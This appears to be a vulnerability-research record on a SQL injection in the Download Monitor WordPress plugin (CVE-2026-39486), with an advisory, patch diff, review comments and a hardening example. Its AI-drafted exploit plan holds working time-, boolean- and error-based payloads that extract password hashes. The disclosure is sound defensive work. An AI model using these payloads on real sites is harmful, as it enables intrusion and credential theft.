[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdxJRBVKC7uSvJtj2vaD_RcUGc3EJiiovgeX5vUxxbcI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-39486","download-monitor-authenticated-contributor-sql-injection","Download Monitor \u003C= 5.1.8 - Authenticated (Contributor+) SQL Injection","The Download Monitor plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.1.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","download-monitor",null,"\u003C=5.1.8","5.1.9","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-25 00:00:00","2026-04-15 21:24:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F60496696-7cb9-44b1-a622-7ee427530c9d?source=api-prod",22,[22,23,24,25,26,27],"changelog.txt","download-monitor.php","includes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php","readme.txt","src\u002FShortcodes.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Research Plan: CVE-2026-39486 - Download Monitor SQL Injection\n\n## 1. Vulnerability Summary\nThe Download Monitor plugin (\u003C= 5.1.8) is vulnerable to an authenticated SQL injection. The issue resides in the way the plugin handles query ordering and sorting, specifically within its backwards compatibility logic and shortcode processing. When a user with Contributor-level access or higher uses the `[downloads]` shortcode with a malicious `order` or `orderby` attribute, the input is improperly handled and concatenated into a `posts_orderby` filter, allowing for the injection of arbitrary SQL commands.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: The injection occurs when rendering the `[downloads]` shortcode. This can be triggered by a Contributor+ user creating a post\u002Fpage (or previewing one) containing the shortcode.\n*   **Vulnerable Action**: Shortcode rendering for `[downloads]`.\n*   **Vulnerable Parameter**: `order` or `orderby` attribute within the shortcode.\n*   **Authentication Level**: Authenticated (Contributor+). 
Contributors can create and preview posts.\n*   **Preconditions**: At least one download must exist in the system so that the shortcode's query returns results and triggers the `posts_orderby` logic.\n\n## 3. Code Flow\n1.  **Entry Point**: A user creates\u002Fpreviews a post with `[downloads order=\"DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]`.\n2.  **Shortcode Handling**: `DLM_Shortcodes::downloads` (in `src\u002FShortcodes.php`) parses the attributes using `shortcode_atts`.\n3.  **Repository Call**: The attributes are passed to `DLM_Download_Repository::retrieve()`.\n4.  **Filter Trigger**: The repository applies the filter `dlm_query_args`.\n5.  **Backwards Compatibility**: `DLM_Backwards_Compatibility::orderby_compatibility()` (in `includes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php`) is hooked to `dlm_query_args`.\n6.  **Filter Registration**: If specific criteria are met (e.g., `orderby` is set to `meta_value_num` or `order_by_count` is used), it adds a filter to `posts_orderby` via `add_filter( 'posts_orderby', array( $this, 'orderby_download_count_compatibility' ) )`.\n7.  **Vulnerable Sink**: `orderby_download_count_compatibility` (and associated methods) concatenates the `order` attribute directly into the SQL string without using `$wpdb->prepare` or sufficient whitelisting\u002Fescaping.\n8.  **Execution**: WordPress executes the modified query during the post preview\u002Frender, triggering the `SLEEP()` command.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via **Shortcode Rendering** in a post preview. Post previews in WordPress generally do **not** require a plugin-specific nonce to execute shortcodes; they rely on the user's authentication cookies and the standard WordPress `post.php` preview mechanism.\n\n**If an AJAX endpoint (like the Reports interface) is the target instead**:\n1.  Navigate to the Download Monitor Reports page.\n2.  
Use `browser_eval` to extract the nonce:\n    *   `browser_eval(\"window.dlm_reports_vars?.nonce\")`\n3.  However, for a Contributor-level exploit, the **shortcode preview** is the most reliable and direct path.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection via the `order` attribute of the `[downloads]` shortcode.\n\n1.  **Login**: Authenticate as a Contributor.\n2.  **Setup**: Ensure a download exists (using WP-CLI).\n3.  **Create Payload Post**: Use the `http_request` tool to create a draft post containing the malicious shortcode.\n4.  **Execute Injection**: Navigate to the preview URL of that post.\n5.  **Payload**:\n    `[downloads orderby=\"ID\" order=\"DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]`\n6.  **HTTP Request (Preview)**:\n    *   Method: `GET`\n    *   URL: `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]&preview=true` (Standard WP preview URL)\n    *   Observe: The response time should be >= 5 seconds.\n\n## 6. Test Data Setup\n1.  **Create Download**:\n    `wp post create --post_type=dlm_download --post_title=\"Test Download\" --post_status=publish`\n2.  **Create Contributor User**:\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Create Exploit Post (as Contributor)**:\n    `wp post create --post_type=post --post_title=\"Exploit\" --post_content='[downloads orderby=\"ID\" order=\"ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]' --post_author=[CONTRIBUTOR_ID] --post_status=draft`\n\n## 7. Expected Results\n*   A normal preview request should complete in \u003C 1 second.\n*   The exploit request (with the `SLEEP(5)` payload) should take significantly longer. The injected term is an uncorrelated scalar subquery over a derived table, which MySQL materializes once rather than per row, so expect a single delay of roughly 5 seconds regardless of how many downloads match or what `posts_per_page` is.\n*   The database engine executes the sleep command as part of the `ORDER BY` clause.\n\n## 8. Verification Steps\n1.  
**Check Query Logs**: If possible, check the MySQL general log to see the executed query:\n    `SELECT ... ORDER BY ... ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a) ...`\n2.  **Database state**: Confirm the Contributor user exists and can view the preview.\n3.  **Timing Analysis**: Use the `time_total` from the Playwright\u002Fhttp_request tool to confirm the delay.\n\n## 9. Alternative Approaches\n*   **Boolean-Based**: Use `IF(1=1, ID, post_title)` (the `wp_posts` column is `post_title`, not `title`) to see if the sort order changes, then substitute `1=1` with a subquery like `(SELECT 1 FROM wp_users WHERE user_login='admin' AND user_pass LIKE '$P$%')`.\n*   **Error-Based**: Use `GTID_SUBSET(CONCAT(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)` if the plugin or environment displays database errors.\n*   **Reports Endpoint**: If the shortcode is patched but the Reports interface is not, target `admin-ajax.php?action=dlm_reports_data` with a payload in the `order_by` or `order` JSON parameter. This would require a nonce usually found in `dlm_reports_vars`.","The Download Monitor plugin for WordPress is vulnerable to authenticated SQL Injection via the 'order' attribute in the [downloads] shortcode. 
Contributor-level users and above can exploit this to inject arbitrary SQL commands into the ORDER BY clause of database queries, potentially leading to unauthorized data extraction.","\u002F\u002F src\u002FShortcodes.php line 408\n$order          = strtoupper( $order );\n\n---\n\n\u002F\u002F includes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php line 285\nif ( isset( $this->filters['order'] ) ) {\n\n\t$order = $this->filters['order'];\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php\t2024-11-28 14:28:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php\t2026-03-04 11:41:50.000000000 +0000\n@@ -285,7 +285,9 @@\n \n \t\tif ( isset( $this->filters['order'] ) ) {\n \n-\t\t\t$order = $this->filters['order'];\n+\t\t\t$order = in_array( strtoupper( $this->filters['order'] ), array( 'ASC', 'DESC' ), true )\n+\t\t\t\t? 
strtoupper( $this->filters['order'] )\n+\t\t\t\t: 'DESC';\n \t\t}\n \n \t\tif ( apply_filters( 'dlm_count_meta_downloads', true ) ) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fsrc\u002FShortcodes.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fsrc\u002FShortcodes.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fsrc\u002FShortcodes.php\t2024-11-28 14:28:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fsrc\u002FShortcodes.php\t2026-03-04 11:41:50.000000000 +0000\n@@ -406,6 +406,7 @@\n \t\t\t\t$exclude_tag\n \t\t\t) : '';\n \t\t\t$order          = strtoupper( $order );\n+\t\t\t$order          = in_array( $order, array( 'ASC', 'DESC' ), true ) ? $order : 'DESC';\n \t\t\t$meta_key       = '';\n \t\t\t$order_by_count = '';","The exploit targets the [downloads] shortcode processing logic. An attacker with Contributor-level privileges (who can create and preview posts) initiates the attack by creating a post or page containing the [downloads] shortcode with a maliciously crafted 'order' attribute. Specifically, the 'order' attribute is supplied with a value like 'DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)', which is concatenated into the SQL ORDER BY clause by the plugin's backwards compatibility layer for download counts. When the attacker previews the post, WordPress renders the shortcode, causing the underlying SQL query to execute the SLEEP() command, confirming the time-based injection. 
This technique can be extended to extract sensitive database information using boolean-based or error-based payloads.","gemini-3-flash-preview","2026-04-17 22:58:58","2026-04-17 22:59:46",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","5.1.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags"]
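Review bot: in the class-dlm-backwards-compatibility.php hunk (@@ -285,7 +285,9 @@) the allow-list covers `order` only, while the research plan on this page names `orderby` as a second injected attribute and nothing in the patch touches it; confirm that `orderby` is only ever handed to WP_Query as a query argument and is never concatenated by this class into the `posts_orderby` string, otherwise the same fix is needed there. Also, `strtoupper( $this->filters['order'] )` is evaluated twice; computing it once into the local first, `$order = strtoupper( $this->filters['order'] ); $order = in_array( $order, array( 'ASC', 'DESC' ), true ) ? $order : 'DESC';`, reads more clearly and matches the shape used in the Shortcodes.php hunk.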
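Review bot: the Shortcodes.php hunk (@@ -406,6 +406,7 @@) duplicates the two-keyword allow-list that the backwards-compatibility hunk introduces, so a third call site is easy to miss; a single shared helper (name it as the project prefers, none is shown here) that both files call would keep the rule in one place. The silent fallback to `'DESC'` also changes observable behaviour for any caller that previously passed something other than `asc`/`desc`, and that deserves a line in the changelog.txt entry the patch already touches.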
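The following is an added example, not Download Monitor's own code: a stand-alone PHP model of the `posts_orderby` path described above. Two functions build the clause fragment that WP_Query would receive, one mirroring the 5.1.8 behaviour (the `order` attribute upper-cased and concatenated as-is) and one mirroring the 5.1.9 allow-list from the diff. The column expression `mt1.meta_value+0`, the function names and the constructed inputs are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code): how an unvalidated `order` value
// reaches ORDER BY through a posts_orderby-style callback, and the allow-list
// the 5.1.9 patch applies. No WordPress needed; run with: php example.php

/**
 * 5.1.8 shape: `order` is upper-cased and appended as-is. The value sits in
 * SQL keyword position, so neither quoting nor a $wpdb->prepare() placeholder
 * applies; a comma lets an attacker append a second ORDER BY term.
 */
function vulnerable_orderby_clause( string $order ): string {
    $order = strtoupper( $order );
    return 'mt1.meta_value+0 ' . $order; // hypothetical column expression
}

/**
 * 5.1.9 shape: strict allow-list, anything else falls back to DESC.
 */
function hardened_orderby_clause( string $order ): string {
    $order = strtoupper( $order );
    $order = in_array( $order, array( 'ASC', 'DESC' ), true ) ? $order : 'DESC';
    return 'mt1.meta_value+0 ' . $order;
}

/**
 * Regression check a plugin test suite could keep: the clause must be the
 * column expression followed by exactly one of the two keywords, nothing else.
 */
function orderby_clause_is_safe( string $clause ): bool {
    return 1 === preg_match( '/^mt1\.meta_value\+0 (ASC|DESC)$/', $clause );
}

// Constructed inputs: a benign attribute value and the time-based payload
// from the exploit outline above.
$inputs = array(
    'benign'  => 'asc',
    'payload' => 'DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)',
);

foreach ( $inputs as $label => $order ) {
    printf( "%-8s 5.1.8: ORDER BY %s\n", $label, vulnerable_orderby_clause( $order ) );
    printf( "%-8s 5.1.9: ORDER BY %s\n", $label, hardened_orderby_clause( $order ) );
}

// The payload survives the 5.1.8 path and is coerced to DESC on the 5.1.9
// path; the benign value is accepted by both.
assert( ! orderby_clause_is_safe( vulnerable_orderby_clause( $inputs['payload'] ) ) );
assert( orderby_clause_is_safe( hardened_orderby_clause( $inputs['payload'] ) ) );
assert( orderby_clause_is_safe( hardened_orderby_clause( $inputs['benign'] ) ) );
```

The design point is the one the diff makes: a value that lands in keyword position cannot be made safe by escaping, only by an allow-list (or by mapping it to a constant), which is why `esc_sql()` or `$wpdb->prepare()` would not have fixed this sink.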